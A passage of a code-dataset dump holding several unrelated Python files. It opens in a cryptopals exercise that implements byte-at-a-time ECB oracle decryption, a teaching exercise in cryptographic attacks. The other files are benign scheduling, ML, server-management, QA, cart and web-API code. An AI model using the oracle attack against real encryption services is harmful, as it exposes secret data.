aligned = False\n while start1 < max_rand + block_len:\n fst = code[start1: start2]\n snd = code[start2: start3]\n third = code[start3: start3 + block_len]\n # check for collision against randomly generated prefix\n if fst == snd and snd != third:\n aligned = True\n break\n else:\n start1, start2, start3 = start2, start3, start3 + block_len\n\n return start3 if aligned else None\n\ndef smart_oracle(oracle, text, code, block_len, max_rand):\n \"\"\"Call oracle normally, or repeatedly call oracle in case of random prefix.\n Returns \"clean\" oracle ouptut regardless of whether the oracle adds a\n random prefix.\n \"\"\"\n if not max_rand:\n return oracle(text, code) if code else oracle(text)\n\n # append arbitrary bytes unlikely to occur in attacker-controlled plaintext\n text_mod = bytearray([7] * block_len * 2) + text\n success = False\n while not success:\n encrypted = oracle(text_mod, code) if code else oracle(text_mod)\n text_start = blocks_aligned(encrypted, block_len, max_rand)\n if text_start is not None:\n success = True\n\n return encrypted[text_start:]\n\ndef gen_ECB_guesses(oracle, short, block_len, max_rand):\n \"\"\"Generate all possible full blocks given oracle and short block.\"\"\"\n guesses = {}\n for n in xrange(256):\n code = smart_oracle(oracle, short + bytearray([n]), [],\n block_len, max_rand)\n guesses[str(code[:16])] = bytearray([n])\n return guesses\n\ndef decrypt_ECB_block(oracle, block_len, block, max_rand=0):\n \"\"\"Brute-force decrypt ECB block using oracle.\n Assume there may be max_rand number of random bits prepended in oracle.\n Args\n oracle: function, ECB oracle\n block_len: int, lenght of cipher block\n block: bytearray of code block to decrypt\n max_rand: int, maximum number of random bytes prefixed by oracle\n Returns\n bytearray of plaintext block\n \"\"\"\n guess = bytearray('A' * block_len)\n for ind in xrange(block_len):\n short = guess[1:]\n target = smart_oracle(oracle, short, block[ind:], block_len, max_rand)\n guesses = gen_ECB_guesses(oracle, short, block_len, max_rand)\n found_byte = guesses[str(target[:16])]\n guess = guess[1:] + found_byte\n\n return guess\n\ndef decrypt_oracle_ECB(oracle, block_len, code, max_rand=0):\n \"\"\"Perform byte-at-a-time ECB decryption with given oracle.\n Args\n oracle: function, ECB oracle\n block_len: int, length of cipher block\n code: bytearray, ciphertext\n max_rand: int, max number of random bytes prefixed by oracle\n Returns\n bytearray of plaintext\n \"\"\"\n plaintext = ''\n block, rest = code[:block_len], code[block_len:]\n\n while block or rest:\n decrypted = decrypt_ECB_block(oracle, block_len, block, max_rand)\n plaintext += decrypted\n block, rest = rest[:block_len], rest[block_len:]\n\n return plaintext[:len(code)]\n\n# tests\n\ndef test_ECB_symmetry():\n \"\"\"Test ECB encrypt -> decrypt yields original.\"\"\"\n text = 'test' * 16\n key = gen_rand_key()\n AES_key = AES.new(str(key), AES.MODE_ECB)\n\n cipher = apply_ECB('encrypt', text, AES_key)\n plain = apply_ECB('decrypt', cipher, AES_key)\n assert text == plain\n\n return True\n\ndef test_CBC_symmetry():\n \"\"\"Test CBC encrypt -> decrypt yields original\"\"\"\n text = bytearray('test' * 16)\n key = gen_rand_key()\n iv = gen_rand_key()\n\n cipher = apply_CBC('encrypt', text, key, iv)\n plain = apply_CBC('decrypt', cipher, key, iv)\n assert text == plain\n\n return True\n\ndef test_blocks_aligned():\n \"\"\"Test blocks_aligned() function.\"\"\"\n sample = 'ABCD' + 'WXYZ' + 'WXYZ' + 'ABC' * 10\n assert blocks_aligned(sample, 4, 4) is 12\n assert blocks_aligned(sample, 2, 2) is 0\n assert blocks_aligned(sample, 3, 9) is 0\n assert blocks_aligned(sample, 3, 10) is 18\n\n return True\n","repo_name":"tkuriyama/cryptopals","sub_path":"set2/python/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"14641943970","text":"from populateFirebase import updateWeek\nfrom utilities.getTodayInfo import getTodayInfo\nimport json\nfrom populateFirebase import populateFirebase\nfrom processStats import processStats\nfrom scrapeToJSON import scrapeToJSON\nfrom scrapeLiveScores import scrapeLiveScores\nfrom setPickable import setPickable\n\n# Weekly Schedule:\n# Tuesday @ 3:30am buildProgramSchedule will be run as the last scheduled event from the previous week\n# It will run and programSchedule.txt will be filled out with schedule information for the coming week\n\n### Program Execution:\ndef buildProgramSchedule(dateInfo):\n # immediately call scrapeToJSON to ensure up-to-date schedule information for the coming week\n scrapeToJSON(dateInfo)\n processStats(dateInfo)\n populateFirebase(dateInfo)\n\n # directly call updateWeek() to enable picking for the next week's games.\n updateWeek(dateInfo)\n setPickable(True)\n\n # Then scrape live scores to capture any odds information for the upcoming week\n scrapeLiveScores(dateInfo)\n\n # create a variable to hold the new schedule\n newSchedule = []\n\n # open the JSON schedule and get the start times of all games\n schedule_target_file = 'data/schedules/'+str(dateInfo['season'])+'.json'\n seasonFile = open(schedule_target_file)\n schedJSON = json.load(seasonFile)\n currWeek = schedJSON['status']['currentWeek'].split(\"-\")[1]\n gameStartTimes = [int(schedJSON[currWeek][matchup]['date']+schedJSON[currWeek][matchup]['time']+'00') for matchup in schedJSON[currWeek]]\n gameStartTimes = list(dict.fromkeys(gameStartTimes)) # De-dupe list\n gameStartTimes.sort() # Sort the list\n gameEndTimes = [time+43000 for time in gameStartTimes] # Derive a list of end times\n\n # Merge the time-windows if they overlap\n gameTimeWindows = []\n for idx, sTime in enumerate(gameStartTimes):\n eTime = gameEndTimes[idx]\n if idx == 0:\n gameTimeWindows.append([sTime, eTime])\n else:\n if sTime < gameTimeWindows[-1][1]:\n gameTimeWindows[-1][1] = eTime\n else: \n gameTimeWindows.append([sTime, eTime])\n \n\n\n # Beginning now, schedule scrapeLiveScores() every 2 hours until the first game's kickoff\n runTime = int(dateInfo['timestr'])\n schedTime = gameTimeWindows[0][0] - 500 # make last update 5 minutes prior to kickoff\n # correct for base-60 subtraction issues\n pref = str(schedTime)[0:10]\n mins = str(schedTime)[10:-2]\n secs = str(schedTime)[-2:]\n if int(mins) > 59:\n mins = str(int(mins) - 40).zfill(2)\n schedTime = int(pref+mins+secs)\n # actually run the loop and fill out the schedule\n while schedTime >= runTime:\n newSchedule.insert(0, str(schedTime)+'---makeVegasPicks')\n newSchedule.insert(0, str(schedTime)+'---scrapeLiveScores')\n schedTime = schedTime-20000\n # Correct for base-60 weirdness\n year = str(schedTime)[0:4]\n mnth = str(schedTime)[4:6]\n days = str(schedTime)[6:8]\n hour = str(schedTime)[8:10]\n mins = str(schedTime)[10:12]\n secs = str(schedTime)[12:]\n # check for various rollover scenarios\n if int(hour) > 24:\n hour = str(int(hour) - 76).zfill(2)\n if int(days) < 1:\n maxDays = 31\n if int(mnth)-1 in [9,11]: maxDays = 30\n days = str(maxDays).zfill(2)\n mnth = str(int(mnth) - 1).zfill(2)\n if int(mnth) < 1:\n mnth = \"12\"\n year = str(int(year) - 1)\n schedTime = int(year+mnth+days+hour+mins+secs)\n\n\n # Schedule setPickable() to be called exactly when the first game starts to disallow picking after the games start\n newSchedule.append(str(gameTimeWindows[0][0])+\"---setPickable False\")\n\n # Set a var to hold the scrape time\n finalScrape = None\n\n # Loop over each game-window\n for window in gameTimeWindows:\n currTime = window[0]\n endTime = window[1]\n while currTime < window[1]:\n # Schedule scrapeLiveScores() every 15 seconds within each window\n newSchedule.append(str(currTime)+\"---scrapeLiveScores\")\n currTime += 15\n # correct for base-60 weirdness\n pref = str(currTime)[0:8]\n hour = str(currTime)[8:-4]\n mins = str(currTime)[10:-2]\n secs = str(currTime)[-2:]\n if int(secs) > 59:\n secs = str(int(secs) - 60).zfill(2)\n mins = str(int(mins) + 1).zfill(2)\n if int(mins) > 59:\n mins = str(int(mins) - 60).zfill(2)\n hour = str(int(hour) + 1).zfill(2)\n currTime = int(pref+hour+mins+secs)\n # Schedule scrapeToJSON() 8 hours after the window closes\n scrapeTime = endTime+80000\n year = str(scrapeTime)[0:4]\n mnth = str(scrapeTime)[4:6]\n days = str(scrapeTime)[6:8]\n hour = str(scrapeTime)[8:10]\n mins = str(scrapeTime)[10:12]\n secs = str(scrapeTime)[12:]\n # check for various rollover scenarios\n if int(hour) > 24:\n hour = str(int(hour) - 24).zfill(2)\n days = str(int(days) + 1).zfill(2)\n maxDays = 31\n if int(mnth) in [9,11]: maxDays = 30\n if int(days) > maxDays:\n days = \"01\"\n mnth = str(int(mnth) + 1).zfill(2)\n if int(mnth) > 12:\n mnth = \"01\"\n year = str(int(year) + 1)\n scrapeTime = year+mnth+days+hour+mins+secs\n finalScrape = scrapeTime\n newSchedule.append(str(scrapeTime)+\"---scrapeToJSON\")\n newSchedule.append(str(scrapeTime)+\"---processStats\")\n newSchedule.append(str(scrapeTime)+\"---populateFirebase\")\n\n # check if it is the final week\n if int(dateInfo['weekID'].split('-')[1].replace('week','')) != 18:\n # add a line to schedule this program to run again in a week\n newSchedule.append(str(finalScrape)+\"---buildProgramSchedule\")\n\n with open('programSchedule.txt', 'w') as f:\n for line in newSchedule:\n f.write(f\"{line}\\n\")\n\n# di = getTodayInfo()\n# buildProgramSchedule(di)","repo_name":"Chucksef/NFLScrape","sub_path":"buildProgramSchedule.py","file_name":"buildProgramSchedule.py","file_ext":"py","file_size_in_byte":6257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34995971460","text":"\nimport torch\nimport torch.nn as nn\n\nfrom tensordict.tensordict import TensorDict\nfrom torchrl.envs import EnvBase\n\nfrom rl4co.models.nn.graph.gat import GraphAttentionEncoder\nfrom rl4co.models.nn.utils import get_log_likelihood\nfrom rl4co.models.zoo.amppo.decoder import PPODecoder\nfrom rl4co.utils.pylogger import get_pylogger\n\nlog = get_pylogger(__name__)\n\n\nclass PPOAttentionModelPolicy(nn.Module):\n def __init__(\n self,\n env: EnvBase,\n encoder: nn.Module = None,\n decoder: nn.Module = None,\n embedding_dim: int = 128,\n num_encoder_layers: int = 3,\n num_heads: int = 8,\n normalization: str = \"batch\",\n mask_inner: bool = True,\n use_native_sdpa: bool = False,\n force_flash_attn: bool = False,\n train_decode_type: str = \"sampling\",\n val_decode_type: str = \"greedy\",\n test_decode_type: str = \"greedy\",\n **unused_kw,\n ):\n super(PPOAttentionModelPolicy, self).__init__()\n if len(unused_kw) > 0:\n log.warn(f\"Unused kwargs: {unused_kw}\")\n\n self.env = env\n\n self.encoder = (\n GraphAttentionEncoder(\n num_heads=num_heads,\n embedding_dim=embedding_dim,\n num_layers=num_encoder_layers,\n env=self.env,\n normalization=normalization,\n use_native_sdpa=use_native_sdpa,\n force_flash_attn=force_flash_attn,\n )\n if encoder is None\n else encoder\n )\n\n self.decoder = (\n PPODecoder(\n env,\n embedding_dim,\n num_heads,\n mask_inner=mask_inner,\n force_flash_attn=force_flash_attn,\n )\n if decoder is None\n else decoder\n )\n\n self.train_decode_type = train_decode_type\n self.val_decode_type = val_decode_type\n self.test_decode_type = test_decode_type\n\n def forward(\n self,\n td: TensorDict,\n phase: str = \"train\",\n return_action: bool = False,\n return_entropy: bool = False,\n given_actions: torch.Tensor = None,\n **decoder_kwargs,\n ) -> dict:\n # Encode inputs\n embeddings, _ = self.encoder(td)\n\n # Get decode type depending on phase\n if decoder_kwargs.get(\"decode_type\", None) is None:\n decoder_kwargs[\"decode_type\"] = getattr(self, f\"{phase}_decode_type\")\n\n # Main rollout: autoregressive decoding\n log_p, actions, td_out = self.decoder(\n td, embeddings, given_actions=given_actions, **decoder_kwargs\n )\n\n # Log likelihood is calculated within the model since returning it per action does not work well with\n ll = get_log_likelihood(\n log_p, actions, td_out.get(\"mask\", None), return_sum=False\n )\n\n out = {\n \"reward\": td_out[\"reward\"],\n \"log_likelihood\": ll, # [batch, decoder steps]\n }\n\n if given_actions is not None:\n selected_log_p = get_log_likelihood(\n log_p, given_actions, td_out.get(\"mask\", None), return_sum=False\n )\n assert selected_log_p.isfinite().all(), \"Log p is not finite\"\n out[\"selected_log_p\"] = selected_log_p # [batch, decoder steps]\n\n if return_action:\n out[\"actions\"] = actions # [batch, decoder steps]\n\n if return_entropy:\n # log_p [batch, decoder steps, num nodes]\n log_p = torch.nan_to_num(log_p, nan=0.0)\n entropy = -(log_p.exp() * log_p).sum(dim=-1) # [batch, decoder steps]\n entropy = entropy.sum(dim=1) # [batch] -- sum over decoding steps\n assert entropy.isfinite().all(), \"Entropy is not finite\"\n out[\"entropy\"] = entropy\n\n return out\n","repo_name":"mhjang/rl4co","sub_path":"rl4co/models/zoo/amppo/policy.py","file_name":"policy.py","file_ext":"py","file_size_in_byte":3865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"83"} +{"seq_id":"37228983501","text":"import os\nimport re\nimport time\nimport xml.etree.ElementTree as ET\nfrom enum import Enum\nfrom datetime import datetime\nfrom omsdk.sdkprint import PrettyPrint\nfrom omsdk.sdkcenum import EnumWrapper, TypeHelper\nfrom omsdk.lifecycle.sdklicenseapi import iBaseLicenseApi\nfrom omdrivers.lifecycle.iDRAC.iDRACConfig import LicenseApiOptionsEnum\nimport base64\nimport sys\nimport logging\n\n\nlogger = logging.getLogger(__name__)\nPY2 = sys.version_info[0] == 2\nPY3 = sys.version_info[0] == 3\n\ntry:\n from pysnmp.hlapi import *\n from pysnmp.smi import *\n PySnmpPresent = True\nexcept ImportError:\n PySnmpPresent = False\nfrom omdrivers.enums.iDRAC.iDRACEnums import *\n\nclass iDRACLicense(iBaseLicenseApi):\n def __init__(self, entity):\n if PY2:\n super(iDRACLicense, self).__init__(entity)\n else:\n super().__init__(entity)\n self._job_mgr = entity.job_mgr\n self._config_mgr = entity.config_mgr\n self._license_fqdds = []\n\n def _get_license_json(self):\n if not hasattr(self, 'license') or \"License\" not in self.license:\n self.license = {}\n self.entity._get_entries(self.license, iDRACLicenseEnum)\n if \"LicensableDevice\" in self.license:\n entries = self.license[\"LicensableDevice\"]\n if isinstance(entries, dict):\n entries = [entries]\n for entry in entries:\n self._license_fqdds.append(entry[\"FQDD\"])\n return self.license\n\n def _get_license_text(self, entitlementId):\n retVal = self.entity._export_license(id = entitlementId)\n ltext = self.entity._get_field_from_action(retVal,\n \"Data\", \"ExportLicense_OUTPUT\", \"LicenseFile\")\n if ltext:\n retVal['License'] = base64.b64decode(ltext).decode(\"utf-8\")\n return retVal\n\n def _save_license_text(self, entitlementId, folder):\n retVal = self._get_license_text(entitlementId)\n with open(os.path.join(folder, entitlementId), \"wb\") as output:\n output.write(retVal['License'].encode('UTF-8'))\n output.flush()\n return os.path.join(folder,entitlementId)\n\n def export_license(self, folder):\n expLic = []\n if not os.path.exists(folder):\n os.makedirs(folder)\n elif not os.path.isdir(folder):\n # replace with exception\n return []\n\n self._get_license_json()\n if not \"License\" in self.license:\n # replace with exception\n return []\n\n llist = self.license[\"License\"]\n if isinstance(self.license[\"License\"], dict):\n llist=[llist]\n for i in llist:\n entitlementId = i[\"EntitlementID\"]\n expLic.append(self._save_license_text(entitlementId, folder))\n return expLic\n\n def export_license_share(self, license_share_path):\n self._get_license_json()\n if not \"License\" in self.license:\n return { \"l\" : False }\n\n llist = self.license[\"License\"]\n if isinstance(self.license[\"License\"], dict):\n llist=[llist]\n retval = { 'Status':'Success', 'Exported' : 0, 'Failed to Export' : 0 }\n for i in llist:\n entitlementId = i[\"EntitlementID\"]\n rjson = self.entity._export_license_share(share = license_share_path,\n creds = license_share_path.creds, id = entitlementId)\n rjson = self._job_mgr._job_wait(rjson['Message'], rjson)\n if rjson['Status'] == 'Success':\n retval['Exported'] += 1\n else:\n retval['Failed to Export'] += 1\n if retval['Exported'] == 0 and retval['Failed to Export'] > 0:\n retval['Status'] = 'Failed'\n\n return retval\n\n def _import_license_fqdd(self, license_file, fqdd = \"iDRAC.Embedded.1\", options = LicenseApiOptionsEnum.NoOptions):\n if not os.path.exists(license_file) or not os.path.isfile(license_file):\n logger.debug(license_file + \" is not a file!\")\n return False\n content = ''\n with open(license_file, 'rb') as f:\n content = f.read()\n content = bytearray(base64.b64encode(content))\n for i in range(0, len(content)+65, 65):\n content[i:i] = '\\n'.encode()\n\n return self.entity._import_license(fqdd=fqdd, \n options=options, file=content.decode())\n\n def _import_license_share_fqdd(self, license_share_path, fqdd=\"iDRAC.Embedded.1\", options=LicenseApiOptionsEnum.NoOptions):\n self._get_license_json()\n if not \"License\" in self.license:\n return False\n llist = self.license[\"License\"]\n if isinstance(self.license[\"License\"], dict):\n llist=[llist]\n retval = { 'Status':'Success', 'Imported' : 0, 'Failed to Import' : 0 }\n for i in llist:\n entitlementId = i[\"EntitlementID\"]\n rjson = self.entity._import_license_share(share=license_share_path, \n creds = license_share_path.creds, name=\"Import\",\n fqdd=fqdd, options=options)\n rjson = self._job_mgr._job_wait(rjson['Message'], rjson)\n logger.debug(PrettyPrint.prettify_json(rjson))\n if rjson['Status'] == 'Success':\n retval['Imported'] += 1\n else:\n retval['Failed to Import'] += 1\n if retval['Imported'] == 0 and retval['Failed to Import'] > 0:\n retval['Status'] = 'Failed'\n\n return retval\n\n def _replace_license_fqdd(self, license_file, entitlementId, fqdd = \"iDRAC.Embedded.1\", options = LicenseApiOptionsEnum.NoOptions):\n if not os.path.exists(license_file) or not os.path.isfile(license_file):\n logger.debug(license_file + \" is not a file!\")\n return False\n content = ''\n with open(license_file) as f:\n content = f.read()\n\n return self.entity._replace_license(id = entitlementId, \n fqdd=fqdd, options = options, file=content)\n\n def _delete_license_fqdd(self, entitlementId, fqdd = \"iDRAC.Embedded.1\", options = LicenseApiOptionsEnum.NoOptions):\n return self.entity._delete_license(id = entitlementId, \n fqdd=fqdd, options=options)\n\n @property\n def LicensableDeviceFQDDs(self):\n self._get_license_json()\n return self._license_fqdds\n\n @property\n def LicensableDevices(self):\n self._get_license_json()\n return list(self._config_mgr._fqdd_to_comp(self._license_fqdds))\n\n @property\n def Licenses(self):\n self._get_license_json()\n return self.license[\"License\"]\n\n def import_license(self, license_file, component = \"iDRAC\", options = LicenseApiOptionsEnum.NoOptions):\n fqddlist = self._config_mgr._comp_to_fqdd(self.LicensableDeviceFQDDs, component, default=[component])\n return self._import_license_fqdd(license_file, fqdd = fqddlist[0], options = options)\n\n def import_license_share(self, license_share_path, component=\"iDRAC\", options=LicenseApiOptionsEnum.NoOptions):\n fqddlist = self._config_mgr._comp_to_fqdd(self.LicensableDeviceFQDDs, component, default=[component])\n return self._import_license_share_fqdd(license_share_path, fqdd = fqddlist[0], options = options)\n\n def replace_license(self, license_file, entitlementId, component = \"iDRAC\", options = LicenseApiOptionsEnum.NoOptions):\n fqddlist = self._config_mgr._comp_to_fqdd(self.LicensableDeviceFQDDs, component, default=[component])\n return self._replace_license_fqdd(license_file, entitlementId, fqdd = fqddlist[0], options = options)\n\n def delete_license(self, entitlementId, component = \"iDRAC\", options = LicenseApiOptionsEnum.NoOptions):\n fqddlist = self._config_mgr._comp_to_fqdd(self.LicensableDeviceFQDDs, component, default=[component])\n return self._delete_license_fqdd(entitlementId, fqdd = fqddlist[0], options = options)\n","repo_name":"akaushik-vm/omsdk","sub_path":"omdrivers/lifecycle/iDRAC/iDRACLicense.py","file_name":"iDRACLicense.py","file_ext":"py","file_size_in_byte":8003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"25049349369","text":"import json\nimport numpy as np\nimport time\nimport jieba\nfrom jieba import analyse\nimport os\n\n\ndef create_vec_dict(file_path):\n file = open(file_path, \"r\")\n lines = file.readlines()\n vecs_dic = {}\n for line in lines:\n li = line.strip().split()\n vec = [float(ele) for ele in li[1:]]\n vecs_dic[li[0]] = vec\n return vecs_dic\n\ndef sent2vec(sent, vecs_dic):\n \"Turn a sentence into a vector.\"\n sent_vecs = []\n tokenizer = jieba.dt\n words = tokenizer.cut(sent.strip())\n words_set = set(words)\n word_weight_dic = {}\n for word in words_set:\n word_weight_dic[word] = 1\n word_weight_pairs = analyse.extract_tags(sent, withWeight=True)\n for word_weight in word_weight_pairs:\n word = word_weight[0]\n weight = word_weight[1]\n word_weight_dic[word] = weight\n for key in word_weight_dic.keys():\n try:\n weighted_vec = np.array(vecs_dic[key])*word_weight_dic[key]\n sent_vecs.append(weighted_vec)\n except:\n sent_vecs.append(np.zeros(300))\n vec = np.sum(sent_vecs, axis=0)\n return vec\n\ndef main_cache(file_path,vecs_dic):\n file = open(file_path, \"r\")\n lines = file.readlines()\n vecs = []\n l2_norms = []\n answers = []\n questions = []\n for line in lines:\n dic = eval(line.strip())\n question = dic['question']\n vec = sent2vec(question,vecs_dic)\n l2_norm = np.linalg.norm(vec)\n # 当l2_norm=0时无法计算 cosine similarity,所以要跳过这样的问题,进入下一个问题的处理\n if l2_norm == np.zeros(1)[0]:\n continue\n vecs.append(vec)\n l2_norms.append(l2_norm)\n answers.append(dic['answers'])\n questions.append(question)\n vecs = np.mat(vecs)\n l2_norms = np.array(l2_norms)\n return vecs, l2_norms, answers, questions\n\ndef compute_similarities(mat, vec, denominators):\n '''\n Calculate the cosine similarities between the input question\n and the questions already in the cache.\n '''\n mat1 = np.reshape(vec, (300,1))\n mat1 = np.mat(mat1)\n numerators = np.matmul(mat, mat1)\n similarities = []\n numerators = np.reshape(numerators, (numerators.shape[0],))\n similarities = numerators/denominators\n return similarities\n\ndef semantics_matching(question):\n startPoint = time.time()\n vec = sent2vec(question, vecs_dic)\n denominators = np.linalg.norm(vec)*l2_norms\n similarities = compute_similarities(vecs, vec, denominators)\n index = np.argmax(similarities)\n similarities = np.array(similarities)\n # print (type(similarities))\n # print (similarities[0])\n score = similarities[0][index]\n endPoint = time.time()\n print ('The process time is: ', str(endPoint-startPoint))\n return questions[index], answers[index], score\n\n'''que1 = '广州有什么好玩的?'\nque2 = '端午节是为了纪念谁?'\nque3 = '中华人民共和国在哪一年成立?'\nque4 = '范冰冰的身高是?'\nque5 = '“认识你自己”是哪位哲学家说的?'\n\nque6 = '资本论的作者是?'\nque7 = '商鞅是怎么死的?'\n\nque8 = '阿胶的制作方法?'\nque9 = '黄家驹的作品有哪些?'\nque10 = '刘亦菲主演过哪些电视剧?'\n'''\n\nCN_EN_QA_DATA_PATH = os.getenv('CN_EN_QA_DATA_PATH')\nbaike_vectors_path = os.path.join(CN_EN_QA_DATA_PATH, 'baidubaike')\nbaidu_factoids_path = os.path.join(CN_EN_QA_DATA_PATH, 'baidu_factoid_qa_pairs.json')\nvecs_dic = create_vec_dict(baike_vectors_path)\nvecs, l2_norms, answers, questions = main_cache(baidu_factoids_path, vecs_dic)\n\n'''ques = [que1, que2, que3, que4, que5, que6, que7, que8, que9, que10]\nfor que in ques:\n similar_question, ans, score = semantics_matching(que)\n # print ('The most similar question to the input question is: ', similar_question)\n # print ('The answers are: ', ans)\n print ('The score for the answer is: ', score)\n'''\n\n\n\n\n\n","repo_name":"sfhong2019/china_drqa","sub_path":"CN_EN_qa/utlis/simQA/SIM_MATCH.py","file_name":"SIM_MATCH.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34535327710","text":"from product import Product\n\n\nclass CartIter:\n def __init__(self, products, quantities):\n self.__products = products\n self.__quantities = quantities\n self.index = 0\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.index < len(self.__products):\n self.index += 1\n return self.__products[self.index - 1], self.__quantities[self.index - 1]\n raise StopIteration()\n\n\nclass Cart:\n def __init__(self):\n self.products = []\n self.quantities = []\n\n def add_product(self,\n product: Product,\n quantity: int | float):\n if not isinstance(product, Product):\n raise TypeError('Error in Product datatype')\n elif not isinstance(quantity, int | float):\n raise TypeError('Error in quantity of Product')\n elif quantity <= 0:\n raise ValueError('Quantity must be > 0. But less or equal got.')\n self.products.append(product)\n self.quantities.append(quantity)\n\n def total(self):\n summa = 0\n for product, quantity in zip(self.product, self.quantities):\n summa += product.price * quantity\n return summa\n\n def __getitem__(self, index):\n if isinstance(index, int):\n if 0 <= index < len(self.products):\n return self.products[index]\n raise IndexError(\"Index out of range\")\n\n if isinstance(index, slice):\n start = 0 if index.start is None else index.start\n stop = len(self.products) if index.stop is None else index.stop\n step = 1 if index.step is None else index.step\n\n tmp = []\n if start < 0 and stop > len(self.products):\n raise IndexError\n for i in range(start, stop, step):\n tmp.append(self.products[i])\n return tmp\n\n def __len__(self):\n return len(self.products)\n\n\n def __iter__(self):\n return CartIter(self.products, self.quantities)\n\n def __str__(self):\n res = ''\n for product, quantity in zip(self.products, self.quantities):\n res += f'{product} x {quantity} = {product.price * quantity}$ \\n'\n return res\n","repo_name":"leprikon8888/products","sub_path":"cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"24943581426","text":"from typing import List\n\nfrom fastapi import APIRouter, status, Depends, HTTPException, Response\n\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom sqlalchemy.future import select\n\nfrom models.artigo_model import ArtigoModel\nfrom models.usuario_model import UsuarioModel\nfrom schemas.artigo_schema import ArtigoSchema\nfrom core.deps import get_session, get_current_user\n\n\nrouter = APIRouter()\n\n\n# POST Artigo\n@router.post('/', status_code=status.HTTP_201_CREATED, response_model=ArtigoSchema)\nasync def post_artigo(artigo: ArtigoSchema, usuario_logado: UsuarioModel = Depends(get_current_user), db: AsyncSession = Depends(get_session)):\n novo_artigo: ArtigoModel = ArtigoModel(\n titulo=artigo.titulo, descricao=artigo.descricao, url_fonte=artigo.url_fonte, usuario_id=usuario_logado.id)\n\n db.add(novo_artigo)\n await db.commit()\n\n return novo_artigo\n\n\n# GET Artigos\n@router.get('/', response_model=List[ArtigoSchema])\nasync def get_artigos(db: AsyncSession = Depends(get_session)):\n async with db as session:\n query = select(ArtigoModel)\n result = await session.execute(query)\n artigos: List[ArtigoModel] = result.scalars().unique().all()\n\n return artigos\n\n\n# GET Artigo\n@router.get('/{artigo_id}', response_model=ArtigoSchema, status_code=status.HTTP_200_OK)\nasync def get_artigo(artigo_id: int, db: AsyncSession = Depends(get_session)):\n async with db as session:\n query = select(ArtigoModel).filter(ArtigoModel.id == artigo_id)\n result = await session.execute(query)\n artigo: ArtigoModel = result.scalars().unique().one_or_none()\n\n if artigo:\n return artigo\n else:\n raise HTTPException(detail='Artigo não encontrado',\n status_code=status.HTTP_404_NOT_FOUND)\n\n\n# PUT Artigo\n@router.put('/{artigo_id}', response_model=ArtigoSchema, status_code=status.HTTP_202_ACCEPTED)\nasync def put_artigo(artigo_id: int, artigo: ArtigoSchema, db: AsyncSession = Depends(get_session), usuario_logado: UsuarioModel = Depends(get_current_user)):\n async with db as session:\n query = select(ArtigoModel).filter(ArtigoModel.id == artigo_id)\n result = await session.execute(query)\n artigo_up: ArtigoModel = result.scalars().unique().one_or_none()\n\n if artigo_up:\n if artigo.titulo:\n artigo_up.titulo = artigo.titulo\n if artigo.descricao:\n artigo_up.descricao = artigo.descricao\n if artigo.url_fonte:\n artigo_up.url_fonte = artigo.url_fonte\n if usuario_logado.id != artigo_up.usuario_id:\n artigo_up.usuario_id = usuario_logado.id\n\n await session.commit()\n\n return artigo_up\n else:\n raise HTTPException(detail='Artigo não encontrado',\n status_code=status.HTTP_404_NOT_FOUND)\n\n\n# DELETE Artigo\n@router.delete('/{artigo_id}', status_code=status.HTTP_204_NO_CONTENT)\nasync def delete_artigo(artigo_id: int, db: AsyncSession = Depends(get_session), usuario_logado: UsuarioModel = Depends(get_current_user)):\n async with db as session:\n query = select(ArtigoModel).filter(ArtigoModel.id == artigo_id).filter(\n ArtigoModel.usuario_id == usuario_logado.id)\n result = await session.execute(query)\n artigo_del: ArtigoModel = result.scalars().unique().one_or_none()\n\n if artigo_del:\n await session.delete(artigo_del)\n await session.commit()\n\n return Response(status_code=status.HTTP_204_NO_CONTENT)\n else:\n raise HTTPException(detail='Artigo não encontrado',\n status_code=status.HTTP_404_NOT_FOUND)\n","repo_name":"guniversityBR/gufapi","sub_path":"api/v1/endpoints/artigo.py","file_name":"artigo.py","file_ext":"py","file_size_in_byte":3743,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"74517637712","text":"import numpy as np\n\nfrom .ancillary_feature import AncillaryFeature\n\n\ndef compute_area_ratio(mm):\n valid = mm[\"area_msd\"] != 0\n out = np.nan * np.ones(len(mm), dtype=float)\n return np.divide(mm[\"area_cvx\"], mm[\"area_msd\"], where=valid, out=out)\n\n\ndef compute_area_um(mm):\n pxs = mm.config[\"imaging\"][\"pixel size\"]\n return mm[\"area_cvx\"] * pxs**2\n\n\ndef compute_aspect(mm):\n \"\"\"Compute the aspect ratio of the bounding box\n\n Notes\n -----\n If the cell is elongated along the channel, i.e.\n `size_x` is larger than `size_y`, then the aspect\n ratio is larger than 1.\n \"\"\"\n out = np.nan * np.ones(len(mm), dtype=float)\n valid = mm[\"size_y\"] != 0\n # parallel to flow, perpendicular to flow\n return np.divide(mm[\"size_x\"], mm[\"size_y\"], where=valid, out=out)\n\n\ndef compute_deform(mm):\n return 1 - mm[\"circ\"]\n\n\ndef compute_index(mm):\n return np.arange(1, len(mm)+1)\n\n\ndef compute_time(mm):\n fr = mm.config[\"imaging\"][\"frame rate\"]\n # Since version 0.47.8, we don't \"normalize\" the time anymore\n # with the information from mm[\"frame\"][0]. This is important\n # for cases where it is important to know the time elapsed before\n # the first event was recorded (issue #207).\n return np.array(mm[\"frame\"], dtype=float) / fr\n\n\nAncillaryFeature(feature_name=\"time\",\n method=compute_time,\n req_config=[[\"imaging\", [\"frame rate\"]]],\n req_features=[\"frame\"])\n\n\nAncillaryFeature(feature_name=\"index\",\n method=compute_index)\n\n\ndef register():\n AncillaryFeature(feature_name=\"area_ratio\",\n method=compute_area_ratio,\n req_features=[\"area_cvx\", \"area_msd\"])\n\n AncillaryFeature(feature_name=\"area_um\",\n method=compute_area_um,\n 